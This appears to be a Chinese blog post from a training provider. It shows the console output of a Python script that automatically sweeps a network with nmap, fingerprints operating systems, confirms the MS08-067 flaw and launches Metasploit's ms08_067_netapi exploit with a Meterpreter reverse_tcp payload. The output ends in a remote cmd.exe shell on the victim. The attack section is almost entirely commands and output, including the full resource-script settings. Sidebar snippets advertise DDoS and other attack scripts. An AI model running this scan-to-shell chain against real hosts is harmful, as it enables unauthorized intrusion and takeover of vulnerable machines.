python网站攻击脚本_Python脚本实现一次全自动化的MS08_067攻击!全程无操作,最后得到cmd.exe!...

最新推荐文章于 2024-05-25 16:59:50 发布
最新推荐文章于 2024-05-25 16:59:50 发布
阅读量371 收藏 1
点赞数 1
文章标签: python网站攻击脚本

root@kali:~/PyQYT/Practice_Lab#

./Hacker_Auto.py 202.100.1.0/24

=============================================================================

第一步:开始NMAP网络Ping扫描以发现活动主机

发现网络中的活动主机:

202.100.1.101

is UP

202.100.1.200

is UP

202.100.1.201

is UP

============================================================================

第二步:判断活动主机的操作系统

活动主机操作系统判断结果:

202.100.1.101 操作系统为: ['Linux

3.8 - 3.19']

202.100.1.200 操作系统为:

['Microsoft Windows 2000 SP0 - SP4', 'Windows XP SP0 -

SP1']

202.100.1.201 操作系统为:

['Microsoft Windows 7 SP0 - SP1', 'Windows Server 2008 SP1',

'Windows 8', 'Windows 8.1 Update 1']

=============================================================================

第三步:开始对可疑系统(Windows)进行针对性的MS08_067确认

被怀疑存在MS08_067漏洞的主机如下:

202.100.1.200

被怀疑可能存在MS08_067漏洞,并且开始进行确认

202.100.1.200

被确认存在MS08_067漏洞!!!

202.100.1.201

被怀疑可能存在MS08_067漏洞,并且开始进行确认

202.100.1.201

被确认不存在MS08_067漏洞

================================================================================

第四步:开始使用Metasploit对存在MS08_067漏洞的主机发起攻击

开始发起对主机202.100.1.200的攻击!

=[

metasploit v4.11.5-2016010401 ]

+ -- --=[ 1517 exploits - 875

auxiliary - 257 post ]

+ -- --=[ 437 payloads - 37

encoders - 8 nops ]

+ -- --=[ Free Metasploit Pro

trial: http://r-7.co/trymsp ]

[*] Processing qytang.rc for

ERB directives.

resource (qytang.rc)> use

exploit/multi/handler

resource (qytang.rc)> set

PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD =>

windows/meterpreter/reverse_tcp

resource (qytang.rc)> set

LPORT 5092

LPORT => 5092

resource (qytang.rc)> set

LHOST 202.100.1.101

LHOST =>

202.100.1.101

resource (qytang.rc)>

exploit -j -z

[*] Exploit running as

background job.

resource (qytang.rc)> setg

DisablePayLoadHandler 1

DisablePayLoadHandler =>

1

resource (qytang.rc)> use

exploit/windows/smb/ms08_067_netapi

resource (qytang.rc)> set

RHOST 202.100.1.200

RHOST =>

202.100.1.200

resource (qytang.rc)> set

payload windows/meterpreter/reverse_tcp

[*] Started reverse TCP handler

on 202.100.1.101:5092

payload =>

windows/meterpreter/reverse_tcp

[*] Starting the payload

handler...

resource (qytang.rc)> set

LPORT 5092

LPORT => 5092

resource (qytang.rc)> set

LHOST 202.100.1.101

LHOST =>

202.100.1.101

resource (qytang.rc)>

exploit -j -z

[*] Exploit running as

background job.

resource (qytang.rc)> sleep

10

[*] Automatically detecting the

target...

[*] Fingerprint: Windows XP -

Service Pack 0 / 1 - lang:English

[*] Selected Target: Windows XP

SP0/SP1 Universal

[*] Attempting to trigger the

vulnerability...

[*] Sending stage (957487

bytes) to 202.100.1.200

[*] Meterpreter session 1

opened (202.100.1.101:5092 -> 202.100.1.200:1032) at 2016-05-20

18:04:41 +0800

resource (qytang.rc)>

sessions -i 1

[*] Starting interaction with

1...

meterpreter > execute -i -f

cmd.exe

Process 1680

created.

Channel 1 created.

Microsoft Windows XP [Version

5.1.2600]

(C) Copyright 1985-2001

Microsoft Corp.

C:\WINDOWS\system32>ipconfig

ipconfig

Windows IP

Configuration

Ethernet adapter Local Area

Connection 2:

Connection-specific DNS Suffix .

:

IP

Address. . . . . . . . . . . . : 202.100.1.200

Subnet

Mask . . . . . . . . . . . : 255.255.255.0

Default

Gateway . . . . . . . . . : 202.100.1.10

C:\WINDOWS\system32>

更多学习资料和题库,请访问乾颐堂官网:

欢迎来我的开源项目PyQYT:

https://github.com/collinsctk/PyQYT

weixin_39671374
关注
Python办公自动化之Excel做表自动化网最,看这一篇就够了!python操作Excel教程
超级大洋葱的博客
08-23 5万+
0.Python Excel库对比 1.Python xlrd 读取 操作Excel 2.Python xlwt 写入 操作Excel 3.Python xlutils 修改 操作Excel 4.Python xlwings 读取 写入 修改 操作Excel 5.Python openpyxl 读取 写入 修改 操作Excel 6.Python xlswriter 写入 操作Excel 7.Python win32com 读取 写入 修改 操作Excel 8.Python pandas 读取 写入 操作Ex
python模拟ddos攻击_python版DDOS攻击脚本
weixin_39887577的博客
11-22 1327
本文实例为大家分享了python版DDOS攻击脚本,供大家参考,具体内容如下于是就找到了我之前收藏的一篇python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了。附上源码pyDdos.py:#!/usr/bin/env pythonimport socketimport timeimport threading#Pressure Test,ddos tool#----------...
python脚本溢出Windows 2000 Professional的漏洞ms08_067
天元喜羊羊的博客
07-07 3007
脚本如下: #!/usr/bin/env python ############################################################################# # MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) # www.hackingspirits.com # www
Python攻防:渗透测试框架】MS08067: 杀死那个pocsuite!
白帽子续命指南
10-21 1075
Python攻防基础篇:闭包和解释器】 【Python攻防基础篇:包、模块、类、对象】 项目地址:https://github.com/knownsec/pocsuite3 曲线救国:https://gitee.com/c0ny10/pocsuite3 我就用我的曲线救国版了,比GitHub快特么100倍! 安装 我用的源码安装 可以pip直接安装,但是装完之后输pocsuite没反应,和项目的readme不太一样我也不知道咋回事。然后pip安的目录又太深了,我嫌麻烦,所以只介绍源码安装,
Python做安测试攻击实战
测试萌萌
05-24 2392
在本文中,我们将使用Python进行一次测试的实战演练,目标是找出并利用应用程序的安漏洞。请注意,这个演练仅用于教育和研究目的,切勿将这些技术用于非法活动。 注意:未经授权的攻击是违法的。确保你在拥有明确权限的环境中执行这些攻击,例如在你自己的应用或经过明确授权的应用上进行。
一键黑客工具:一个Python脚本解决所有攻击操作
m0_59235699的博客
07-29 601
近期出现了可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备。只需点击运行,该脚本就会爬取互联网,寻找可以攻击的脆弱主机(通常是因为没打补丁),并自动取得对这些主机的控制权。完无需什么高端的黑客技术。...
python+appnium_抢菜程序_山姆和盒马_可扩展改造_手机自动化脚本
05-02
原理:通过Appnium实现自动化设备抢菜,可以多台设备同时开抢 环境要求:Python3,requirements.txt下的所有依赖,adb驱动,ATX(启动脚本后会自动安装) 使用步骤: 1. 先下载Python环境,并pip install所有...
python自动化脚本安装指定版本python环境详解.pdf
04-17
Python脚本中,使用了`os`和`sys`这两个Python标准库模块来实现自动化流程。`os`模块提供了与操作系统交互的函数,如判断用户权限(通过`os.getuid()`检查是否为root用户),执行系统命令(如`os.system(cmd)`来...
实用自动化运维Python脚本分享
09-20
本文将深入探讨如何利用Python进行自动化运维,特别是通过并行发送`sh`命令实现批量操作。 首先,我们要了解Python中的`paramiko`库。`paramiko`是一个实现了SSHv2协议的纯Python库,常用于进行远程控制,如执行...
python自动化脚本安装指定版本python环境详解
09-21
首先,编写自动化脚本时,我们需要利用Python内置的`os`模块来执行系统级别的操作,如下载、解压和执行命令。同时,`sys`模块用于处理Python运行时的配置,以及与程序外部的系统环境交互。在脚本开始时,通过`os.get...
Python网络安项目开发实战_搭建Python防范环境_编程案例解析实例详解课程教程.pdf
04-27
黑客,在一般人的印象中都很神秘。他们在网络中攻无不克、战无不胜,似乎无所不能。实际上黑客并没有那么神通广大,黑客技术也没那么复杂,即使是一个网络小白,如果按照科学的方法也可以成为一名合格的黑客。下面就跟随笔者一步步开启各位的黑客之旅吧。
Python编写的可以扫描和攻击网络的脚本
最新发布
2403_83442903的博客
05-25 615
介绍:NetAtAck2是一个用Python编写的可以扫描和攻击网络的脚本①安装。
一个简单的icmp攻击python脚本
m0_73896875的博客
07-06 208
payload = '我没有攻击你!ip = input('请输入ip地址:')@File :icmp攻击.py。@Author :星之尘。
Python 协议攻击脚本(七): DHCP攻击
酉酉的博客
05-18 2208
DCHP知识铺垫 DHCP 动态主机设置协议(英语:Dynamic Host Configuration Protocol,缩写:DHCP)是一个局域网的网络协议,使用UDP协议工作 BOOTP BOOTP(Bootstrap Protocol,引导程序协议)是一种引导协议,基于IP/UDP协议,也称自举协议,是DHCP协议的前身。 关系 DHCP 是BOOTP 的增强版本都是基于TC...
python 网络攻击脚本_[渗透技巧]python脚本处理伪静态注入
weixin_39784972的博客
12-10 238
目前有很多网站做了rewrite,如/?id=1/1/1111.php大趋势下,攻击的门槛逐渐增高。这样有利有弊,喜欢研究的会深入钻研,另一方面只会用工具不懂原理的则充斥到大小论坛水区。实战举例:http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1这个点存在注入Error Nu...
python攻击电脑代码_python攻击代码
weixin_42503264的博客
01-12 3221
# -*- coding: UTF-8 -*-import urllib, urllib2, cookielibimport random, stringmyCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar())openner = urllib2.build_opener(myCookie)while True:QQNumber='...
网页点击脚本_三十个常见的python脚本,别再弄错,会吃亏的,附视频教程
weixin_39640265的博客
12-07 1055
简介:脚本脚本简单地说就是一条条的文字命令,这些文字命令是可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺序执行。因为脚本在 ...脚本脚本简单地说就是一条条的文字命令,这些文字命令是可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺...
5分钟开发教你零基础开发属于自己的油猴脚本(网页随机变颜色)
weixin_45565886的博客
09-12 6710
5分钟开发教你零基础开发属于自己的油猴脚本(网页随机变颜色)
python+selenium实现web自动化脚本总结
shmily_super的专栏
11-09 927
一、元素定位方法 网页元素(web element),页面显示的对象,包括按钮、文字、输入框等都称为HTML页面元素,要操作网页元素首先要找到这个元素,selenium有八大元素定位方法:find_element_by_id 通过id定位元素,id唯一find_element_by_xpath 通过xpath定位,相对/绝对路径find_element_by_name 元素本身属性的名称,可能会定位到多个值,默认返回第一个值 find_element_by_class_name 元素的css 类 find_
Python脚本cmd调用i5ting_toc批量转换Markdown为HTML
这段Python脚本的核心知识点包括: 1. **os模块**:os模块是Python的标准库之一,提供了许多与操作系统交互的功能。在这里,我们使用os.walk遍历目录结构,os.path.splitext分离文件名和扩展名,以及os.getcwd获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值